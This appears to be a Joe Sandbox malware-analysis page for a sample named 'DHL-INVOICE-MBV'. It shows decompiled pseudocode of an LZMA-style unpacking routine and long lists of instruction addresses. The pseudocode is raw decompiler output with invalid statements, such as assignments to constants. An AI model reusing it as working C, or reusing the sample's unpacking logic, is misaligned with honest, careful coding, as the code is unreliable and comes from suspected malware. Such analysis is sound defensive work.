														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L79;
											case 0x1b:
												L75:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t274 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t274;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t283 = __ebp - 0x64;
												 *_t283 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t283;
												 *( *(__ebp - 0x68)) = __cl;
												L79:
												 *(__ebp - 0x14) = __edx;
												goto L80;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L80:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t544 = _t543 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}

0x00000000
0x00406c2d
0x00406c2d
0x00406c31
0x00406c52
0x00406c59
0x00406c5f
0x00406c65
0x00406c77
0x00406c7d
0x00406c82
0x00000000
0x00406c33
0x00406c39
0x00406ffa
0x00406ffa
0x00406ffa
0x00406ffd
0x00406ffd
0x00406ffd
0x00407003
0x00407009
0x0040700f
0x00407029
0x0040702c
0x00407032
0x0040703d
0x0040703f
0x00407011
0x00407011
0x00407020
0x00407024
0x00407024
0x00407049
0x00000000
0x00000000
0x0040704b
0x0040704f
0x004071fe
0x00407214
0x0040721c
0x00407223
0x00407225
0x0040722c
0x00407230
0x00407230
0x0040705b
0x00407062
0x0040706a
0x0040706d
0x00407070
0x00407070
0x00407076
0x00407076
0x00406812
0x00406812
0x00406812
0x0040681b
0x00000000
0x00000000
0x00406821
0x00000000
0x0040682c
0x00000000
0x00000000
0x00406835
0x00406838
0x0040683b
0x0040683f
0x00000000
0x00000000
0x00406845
0x00406848
0x0040684a
0x0040684b
0x0040684e
0x00406850
0x00406851
0x00406853
0x00406856
0x0040685b
0x00406860
0x00406869
0x0040687c
0x0040687f
0x0040688b
0x004068b3
0x004068b5
0x004068c3
0x004068c3
0x004068c7
0x00000000
0x00000000
0x00000000
0x00000000
0x004068b7
0x004068b7
0x004068ba
0x004068bb
0x004068bb
0x00000000
0x004068b7
0x00406891
0x00406896
0x00406896
0x0040689f
0x004068a7
0x004068aa
0x00000000
0x004068b0
0x004068b0
0x00000000
0x004068b0
0x00000000
0x004068cd
0x004068cd
0x004068d1
0x0040717d
0x00000000
0x0040717d
0x004068da
0x004068ea
0x004068ed
0x004068f0
0x004068f0
0x004068f0
0x004068f3
0x004068f7
0x00000000
0x00000000
0x004068f9
0x004068ff
0x00406929
0x0040692f
0x00406936
0x00000000
0x00406936
0x00406905
0x00406908
0x0040690d
0x0040690d
0x00406918
0x00406920
0x00406923
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406968
0x0040696e
0x00406971
0x0040697e
0x00406986
0x00000000
0x00000000
0x0040693d
0x0040693d
0x00406941
0x0040718c
0x00000000
0x0040718c
0x0040694d
0x00406958
0x00406958
0x00406958
0x0040695b
0x0040695e
0x00406961
0x00406966
0x00000000
0x00000000
0x00000000
0x00000000
0x00406ffd
0x00406ffd
0x00407003
0x00407009
0x0040700f
0x00407029
0x0040702c
0x00407032
0x0040703d
0x0040703f
0x00407011
0x00407011
0x00407020
0x00407024
0x00407024
0x00407049
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040698e
0x00406990
0x00406993
0x00406a04
0x00406a07
0x00406a0a
0x00406a11
0x00406a1b
0x00406ffa
0x00406ffa
0x00000000
0x00406ffa
0x00406995
0x00406999
0x0040699c
0x0040699e
0x004069a1
0x004069a4
0x004069a6
0x004069a9
0x004069ab
0x004069b0
0x004069b3
0x004069b6
0x004069ba
0x004069c1
0x004069c4
0x004069cb
0x004069cf
0x004069d7
0x004069d7
0x004069d7
0x004069d1
0x004069d1
0x004069d1
0x004069c6
0x004069c6
0x004069c6
0x004069db
0x004069de
0x004069fc
0x004069fe
0x00000000
0x004069e0
0x004069e0
0x004069e3
0x004069e6
0x004069e9
0x004069eb
0x004069eb
0x004069eb
0x004069ee
0x004069f1
0x004069f3
0x004069f4
0x004069f7
0x00000000
0x004069f7
0x00000000
0x00000000
0x00000000
0x00406c97
0x00406c9b
0x00406cbe
0x00406cc1
0x00406cc4
0x00406cce
0x00406c9d
0x00406c9d
0x00406ca0
0x00406ca3
0x00406ca6
0x00406cb3
0x00406cb6
0x00406cb6
0x00406ffa
0x00406ffa
0x00406ffa
0x00000000
0x00406ffa
0x00000000
0x00406cda
0x00406cde
0x00000000
0x00000000
0x00406ce4
0x00406ce8
0x00000000
0x00000000
0x00406cee
0x00406cf0
0x00406cf4
0x00406cf4
0x00406cf7
0x00406cfb
0x00000000
0x00000000
0x00406d4b
0x00406d4f
0x00406d56
0x00406d59
0x00406d5c
0x00406d66
0x00406ffa
0x00406ffa
0x00406ffa
0x00000000
0x00406ffa
0x00406ffa
0x00406d51
0x00000000
0x00000000
0x00406d72
0x00406d76
0x00406d7d
0x00406d80
0x00406d83
0x00406d78
0x00406d78
0x00406d78
0x00406d86
0x00406d89
0x00406d8c
0x00406d8c
0x00406d8f
0x00406d92
0x00406d95
0x00406d95
0x00406d98
0x00406d9f
0x00406da4
0x00000000
0x00000000
0x00406e32
0x00406e32
0x00406e36
0x004071d4
0x00000000
0x004071d4
0x00406e3c
0x00406e3f
0x00406e42
0x00406e46
0x00406e49
0x00406e4f
0x00406e51
0x00406e51
0x00406e51
0x00406e54
0x00406e57
0x00000000
0x00000000
0x00406a27
0x00406a27
0x00406a2b
0x00407198
0x00000000
0x00407198
0x00406a31
0x00406a34
0x00406a37
0x00406a3b
0x00406a3e
0x00406a44
0x00406a46
0x00406a46
0x00406a46
0x00406a49
0x00406a4c
0x00406a4c
0x00406a4f
0x00406a52
0x00000000
0x00000000
0x00406a58
0x00406a5e
0x00000000
0x00000000
0x00406a64
0x00406a64
0x00406a68
0x00406a6b
0x00406a6e
0x00406a71
0x00406a74
0x00406a75
0x00406a78
0x00406a7a
0x00406a80
0x00406a83
0x00406a86
0x00406a89
0x00406a8c
0x00406a8f
0x00406a92
0x00406aae
0x00406ab1
0x00406ab4
0x00406ab7
0x00406abe
0x00406ac2
0x00406ac4
0x00406ac8
0x00406a94
0x00406a94
0x00406a98
0x00406aa0
0x00406aa5
0x00406aa7
0x00406aa9
0x00406aa9
0x00406acb
0x00406ad2
0x00406ad5
0x00000000
0x00406adb
0x00000000
0x00406adb
0x00000000
0x00406ae0
0x00406ae0
0x00406ae4
0x004071a4
0x00000000
0x004071a4
0x00406aea
0x00406aed
0x00406af0
0x00406af4
0x00406af7
0x00406afd
0x00406aff
0x00406aff
0x00406aff
0x00406b02
0x00406b05
0x00406b05
0x00406b05
0x00406b0b
0x00000000
0x00000000
0x00406b0d
0x00406b10
0x00406b13
0x00406b16
0x00406b19
0x00406b1c
0x00406b1f
0x00406b22
0x00406b25
0x00406b28
0x00406b2b
0x00406b43
0x00406b46
0x00406b49
0x00406b4c
0x00406b4c
0x00406b4f
0x00406b53
0x00406b55
0x00406b2d
0x00406b2d
0x00406b35
0x00406b3a
0x00406b3c
0x00406b3e
0x00406b3e
0x00406b58
0x00406b5f
0x00406b62
0x00000000
0x00406b64
0x00000000
0x00406b64
0x00406b62
0x00406b69
0x00406b69
0x00406b69
0x00406b69
0x00000000
0x00000000
0x00406ba4
0x00406ba4
0x00406ba8
0x004071b0
0x00000000
0x004071b0
0x00406bae
0x00406bb1
0x00406bb4
0x00406bb8
0x00406bbb
0x00406bc1
0x00406bc3
0x00406bc3
0x00406bc3
0x00406bc6
0x00406bc9
0x00406bc9
0x00406bcf
0x00406b6d
0x00406b6d
0x00406b70
0x00000000
0x00406b70
0x00406bd1
0x00406bd1
0x00406bd4
0x00406bd7
0x00406bda
0x00406bdd
0x00406be0
0x00406be3
0x00406be6
0x00406be9
0x00406bec
0x00406bef
0x00406c07
0x00406c0a
0x00406c0d
0x00406c10
0x00406c10
0x00406c13
0x00406c17
0x00406c19
0x00406bf1
0x00406bf1
0x00406bf9
0x00406bfe
0x00406c00
0x00406c02
0x00406c02
0x00406c1c
0x00406c23
0x00406c26
0x00000000
0x00406c28
0x00000000
0x00406c28
0x00000000
0x00406eb5
0x00406eb5
0x00406eb9
0x004071e0
0x00000000
0x004071e0
0x00406ebf
0x00406ec2
0x00406ec5
0x00406ec9
0x00406ecc
0x00406ed2
0x00406ed4
0x00406ed4
0x00406ed4
0x00406ed7
0x00000000
0x00000000
0x00406c85
0x00406c85
0x00406c88
0x00406ffa
0x00406ffa
0x00406ffa
0x00000000
0x00406ffa
0x00000000
0x00406fc4
0x00406fc8
0x00406fea
0x00406fed
0x00406ff7
0x00406ffa
0x00406ffa
0x00406ffa
0x00000000
0x00406ffa
0x00406ffa
0x00406fca
0x00406fcd
0x00406fd1
0x00406fd4
0x00406fd4
0x00406fd7
0x00000000
0x00000000
0x00407081
0x00407085
0x004070a3
0x004070a3
0x004070a3
0x004070aa
0x004070b1
0x004070b8
0x004070b8
0x00000000
0x004070b8
0x00407087
0x0040708a
0x0040708d
0x00407090
0x00407097
0x00406fdb
0x00406fdb
0x00406fde
0x00000000
0x00000000
0x00407172
0x00407175
0x00407076
0x00000000
0x00000000
0x00406dac
0x00406dae
0x00406db5
0x00406db6
0x00406db8
0x00406dbb
0x00000000
0x00000000
0x00406dc3
0x00406dc6
0x00406dc9
0x00406dcb
0x00406dcd
0x00406dcd
0x00406dce
0x00406dd1
0x00406dd8
0x00406ddb
0x00406de9
0x00000000
0x00000000
0x004070bf
0x004070bf
0x004070c2
0x004070c9
0x00000000
0x00000000
0x004070ce
0x004070ce
0x004070d2
0x0040720a
0x00000000
0x0040720a
0x004070d8
0x004070db
0x004070de
0x004070e2
0x004070e5
0x004070eb
0x004070ed
0x004070ed
0x004070ed
0x004070f0
0x004070f3
0x004070f3
0x004070f3
0x004070f3
0x004070f6
0x004070f6
0x004070fa
0x0040715a
0x0040715d
0x00407162
0x00407163
0x00407165
0x00407167
0x0040716a
0x00407076
0x00407076
0x00000000
0x0040707c
0x00407076
0x004070fc
0x00407102
0x00407105
0x00407108
0x0040710b
0x0040710e
0x00407111
0x00407114
0x00407117
0x0040711a
0x0040711d
0x00407136
0x00407139
0x0040713c
0x0040713f
0x00407143
0x00407145
0x00407145
0x00407146
0x00407149
0x0040711f
0x0040711f
0x00407127
0x0040712c
0x0040712e
0x00407131
0x00407131
0x0040714c
0x00407153
0x00000000
0x00407155
0x00000000
0x00407155
0x00000000
0x00406df1
0x00406df4
0x00406e2a
0x00406f5a
0x00406f5a
0x00406f5a
0x00406f5a
0x00406f5d
0x00406f5d
0x00406f60
0x00406f62
0x004071ec
0x00000000
0x004071ec
0x00406f68
0x00406f6b
0x00000000
0x00000000
0x00406f71
0x00406f75
0x00406f78
0x00406f78
0x00406f78
0x00000000
0x00406f78
0x00406df6
0x00406df8
0x00406dfa
0x00406dfc
0x00406dff
0x00406e00
0x00406e02
0x00406e04
0x00406e07
0x00406e0a
0x00406e20
0x00406e25
0x00406e5d
0x00406e5d
0x00406e61
0x00406e8d
0x00406e8f
0x00406e96
0x00406e99
0x00406e9c
0x00406e9c
0x00406ea1
0x00406ea1
0x00406ea3
0x00406ea6
0x00406ead
0x00406eb0
0x00406edd
0x00406edd
0x00406ee0
0x00406ee3
0x00406f57
0x00406f57
0x00406f57
0x00000000
0x00406f57
0x00406ee5
0x00406eeb
0x00406eee
0x00406ef1
0x00406ef4
0x00406ef7
0x00406efa
0x00406efd
0x00406f00
0x00406f03
0x00406f06
0x00406f1f
0x00406f21
0x00406f24
0x00406f25
0x00406f28
0x00406f2a
0x00406f2d
0x00406f2f
0x00406f31
0x00406f34
0x00406f36
0x00406f39
0x00406f3d
0x00406f3f
0x00406f3f
0x00406f40
0x00406f43
0x00406f46
0x00406f08
0x00406f08
0x00406f10
0x00406f15
0x00406f17
0x00406f1a
0x00406f1a
0x00406f49
0x00406f50
0x00406eda
0x00406eda
0x00406eda
0x00406eda
0x00000000
0x00406f52
0x00000000
0x00406f52
0x00406f50
0x00406e63
0x00406e66
0x00406e68
0x00406e6b
0x00406e6e
0x00406e71
0x00406e73
0x00406e76
0x00406e79
0x00406e79
0x00406e7c
0x00406e7c
0x00406e7f
0x00406e86
0x00406e5a
0x00406e5a
0x00406e5a
0x00406e5a
0x00000000
0x00406e88
0x00000000
0x00406e88
0x00406e86
0x00406e0c
0x00406e0f
0x00406e11
0x00406e14
0x00000000
0x00000000
0x00406b73
0x00406b73
0x00406b77
0x004071bc
0x00000000
0x004071bc
0x00406b7d
0x00406b80
0x00406b83
0x00406b86
0x00406b89
0x00406b8c
0x00406b8f
0x00406b91
0x00406b94
0x00406b97
0x00406b9a
0x00406b9c
0x00406b9c
0x00406b9c
0x00000000
0x00000000
0x00406cfe
0x00406cfe
0x00406d02
0x004071c8
0x00000000
0x004071c8
0x00406d08
0x00406d0b
0x00406d0e
0x00406d11
0x00406d13
0x00406d13
0x00406d13
0x00406d16
0x00406d19
0x00406d1c
0x00406d1f
0x00406d22
0x00406d25
0x00406d26
0x00406d28
0x00406d28
0x00406d28
0x00406d2b
0x00406d2e
0x00406d31
0x00406d34
0x00406d34
0x00406d34
0x00406d37
0x00406d39
0x00406d39
0x00000000
0x00000000
0x00406f7b
0x00406f7b
0x00406f7b
0x00406f7f
0x00000000
0x00000000
0x00406f85
0x00406f88
0x00406f8b
0x00406f8e
0x00406f90
0x00406f90
0x00406f90
0x00406f93
0x00406f96
0x00406f99
0x00406f9c
0x00406f9f
0x00406fa2
0x00406fa3
0x00406fa5
0x00406fa5
0x00406fa5
0x00406fa8
0x00406fab
0x00406fae
0x00406fb1
0x00406fb4
0x00406fb8
0x00406fba
0x00406fbd
0x00000000
0x00406fbf
0x00406d3c
0x00406d3c
0x00000000
0x00406d3c
0x00406fbd
0x004071f2
0x00000000
0x00000000
0x00406821
0x00407229
0x00407229
0x00000000
0x00407229
0x00407076
0x00406ffd
0x00406ffa
0x00000000
0x00406c31

Memory Dump Source

Source File: 00000001.00000002.17982408419.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.17982352476.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982487562.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982533825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982772919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982864511.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982935048.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982976949.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17983114217.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_DHL-INVOICE-MBV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 133937f1df7ceb29c30f38c33f45990f246052236d4704b56955204b6cd885fa
Instruction ID: dacb8e277fcbb3a33cac5efaa2c5173e23fd2fcd6bf81bdfe6f06a7534410a90
Opcode Fuzzy Hash: 133937f1df7ceb29c30f38c33f45990f246052236d4704b56955204b6cd885fa
Instruction Fuzzy Hash: 6C714371E04229CBDF24CF98C8447ADBBB1FF44305F14806AD446BB281C738AA86DF04

Uniqueness

Uniqueness Score: -1.00%

Function 00406D4B Relevance: 5.2, APIs: 4, Instructions: 170
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406D4B() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xb;
						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x28);
						L88:
						 *(__ebp - 0x2c) = __eax;
						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
						L89:
						__eax =  *(__ebp - 4);
						 *(__ebp - 0x80) = 0x15;
						__eax =  *(__ebp - 4) + 0xa68;
						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
						L69:
						 *(__ebp - 0x84) = 0x12;
						while(1) {
							L132:
							 *(_t613 - 0x54) = _t606;
							while(1) {
								L133:
								_t531 =  *_t606;
								_t589 = _t531 & 0x0000ffff;
								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
								if( *(_t613 - 0xc) >= _t565) {
									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
									 *(_t613 - 0x40) = 1;
									_t532 = _t531 - (_t531 >> 5);
									 *_t606 = _t532;
								} else {
									 *(_t613 - 0x10) = _t565;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									 *_t606 = (0x800 - _t589 >> 5) + _t531;
								}
								if( *(_t613 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t613 - 0x6c) == 0) {
									 *(_t613 - 0x88) = 5;
									L170:
									_t568 = 0x22;
									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
								L139:
								_t533 =  *(_t613 - 0x84);
								while(1) {
									 *(_t613 - 0x88) = _t533;
									while(1) {
										L1:
										_t534 =  *(_t613 - 0x88);
										if(_t534 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t534 * 4 +  &M00407231))) {
											case 0:
												if( *(_t613 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t534 =  *( *(_t613 - 0x70));
												if(_t534 > 0xe1) {
													goto L171;
												}
												_t538 = _t534 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t570);
												_push(9);
												_pop(_t571);
												_t609 = _t538 / _t570;
												_t540 = _t538 % _t570 & 0x000000ff;
												asm("cdq");
												_t604 = _t540 % _t571 & 0x000000ff;
												 *(_t613 - 0x3c) = _t604;
												 *(_t613 - 0x1c) = (1 << _t609) - 1;
												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
												_t612 = (0x300 << _t604 + _t609) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
													L10:
													if(_t612 == 0) {
														L12:
														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t612 = _t612 - 1;
														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
													} while (_t612 != 0);
													goto L12;
												}
												if( *(_t613 - 4) != 0) {
													GlobalFree( *(_t613 - 4)); // executed
												}
												_t534 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t613 - 4) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 1;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t45 = _t613 - 0x48;
												 *_t45 =  *(_t613 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t613 - 0x48) < 4) {
													goto L13;
												}
												_t546 =  *(_t613 - 0x40);
												if(_t546 ==  *(_t613 - 0x74)) {
													L20:
													 *(_t613 - 0x48) = 5;
													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t613 - 0x74) = _t546;
												if( *(_t613 - 8) != 0) {
													GlobalFree( *(_t613 - 8)); // executed
												}
												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
												 *(_t613 - 8) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
												 *(_t613 - 0x84) = 6;
												 *(_t613 - 0x4c) = _t553;
												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
												L132:
												 *(_t613 - 0x54) = _t606;
												goto L133;
											case 3:
												L21:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 3;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												_t67 = _t613 - 0x70;
												 *_t67 =  &(( *(_t613 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
												L23:
												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
												if( *(_t613 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t531 =  *_t606;
												_t589 = _t531 & 0x0000ffff;
												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
												if( *(_t613 - 0xc) >= _t565) {
													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
													 *(_t613 - 0x40) = 1;
													_t532 = _t531 - (_t531 >> 5);
													 *_t606 = _t532;
												} else {
													 *(_t613 - 0x10) = _t565;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													 *_t606 = (0x800 - _t589 >> 5) + _t531;
												}
												if( *(_t613 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
